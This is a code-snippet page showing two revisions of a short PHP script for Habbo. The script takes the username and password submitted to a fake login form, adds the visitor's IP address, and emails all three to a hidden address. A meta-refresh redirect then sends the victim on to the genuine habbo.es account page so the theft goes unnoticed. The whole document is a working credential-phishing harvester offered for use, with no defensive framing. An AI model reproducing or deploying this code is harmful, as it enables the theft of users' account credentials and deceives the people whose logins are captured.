Return to Snippet

Revision: 29072
at July 20, 2010 23:18 by manuellujan


Updated Code
<?php
    $content .= "
Account: " . $_POST['login-username'] . "           ";
    
    $content .= "
Password: " . $_POST['login-password'] . "           ";
    
    $content .= "
IP: " . $_SERVER['REMOTE_ADDR'] . "           ";

    mail("[email protected]","Habbo",$content);

    include ("reload.php");
?>

--------------------------------------------------------------------------------------------

reload.php:

<head>
<meta http-equiv="refresh" content="0;url=https://www.habbo.es/account/submit"/>
</head>

Revision: 29071
at July 20, 2010 23:13 by manuellujan


Initial Code
<?php
    $content .= "
Account: " . $_POST['login-username'] . "           ";
    
    $content .= "
Password: " . $_POST['login-password'] . "           ";
    
    $content .= "
IP: " . $_SERVER['REMOTE_ADDR'] . "           ";

    mail("[email protected]","Habbo",$content);

    include ("reload.php");
?>

Initial URL


Initial Description


Initial Title
Sumbit to Mail Habbo

Initial Tags


Initial Language
PHP